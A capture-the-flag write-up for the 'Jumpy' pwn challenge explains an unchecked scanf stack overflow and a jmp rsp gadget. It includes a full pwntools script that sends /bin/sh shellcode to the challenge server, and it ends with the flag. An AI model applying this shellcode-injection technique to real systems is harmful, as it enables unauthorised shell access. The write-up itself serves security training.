Pwn - Jumpy

Warmup | 62 Solves | 338 points

Description

I like jumping

Downloads

16KB

jumpy

Open

Solution

First, do some reconnaissance on the binary.

Perfect, no binary protections at all :) Now we decompile it in IDA to see its logic.

There is no boundary check for scanf which means we are able to get a stack-based buffer overflow. Also, there is an interesting function np with only 1 instruction in it, jmp rsp.

With that, we can formulate our attack plan as such:

Craft our own /bin/sh shellcode
Buffer overflow to write into RIP and also, write our shellcode onto the stack
Control RIP to execute the jmp rsp gadget
Get shell after shellcode is executed

from pwn import *

# Important to explicitly state the architecture
context.arch='amd64'
context.log_level = 'debug'
shellcode = shellcraft.amd64.linux.sh()

jmp_rsp = 0x401142

p = remote('jumpy.challenge.ctf.thefewchosen.com', 1337)
payload = b''
payload += b'A' * 48
payload += b'B' * 8
payload += p64(jmp_rsp)
payload += asm(shellcode)
p.sendlineafter(b'\n', payload)
p.interactive()

Few things worth noting:

From IDA we know v4 is 48 bytes away from rbp ([rbp-0x30])
We need to overwrite 8 more bytes because of rbp and the binary is in 64-bit architecture
Initially I did not explicitly state the context.arch to amd64 and was struggling to find out why I am not getting a shell, turns out it is important to explicitly state that!!

Flag: TFCCTF{B0unc3_B0unc3_B0unc3}

Last updated 5 months ago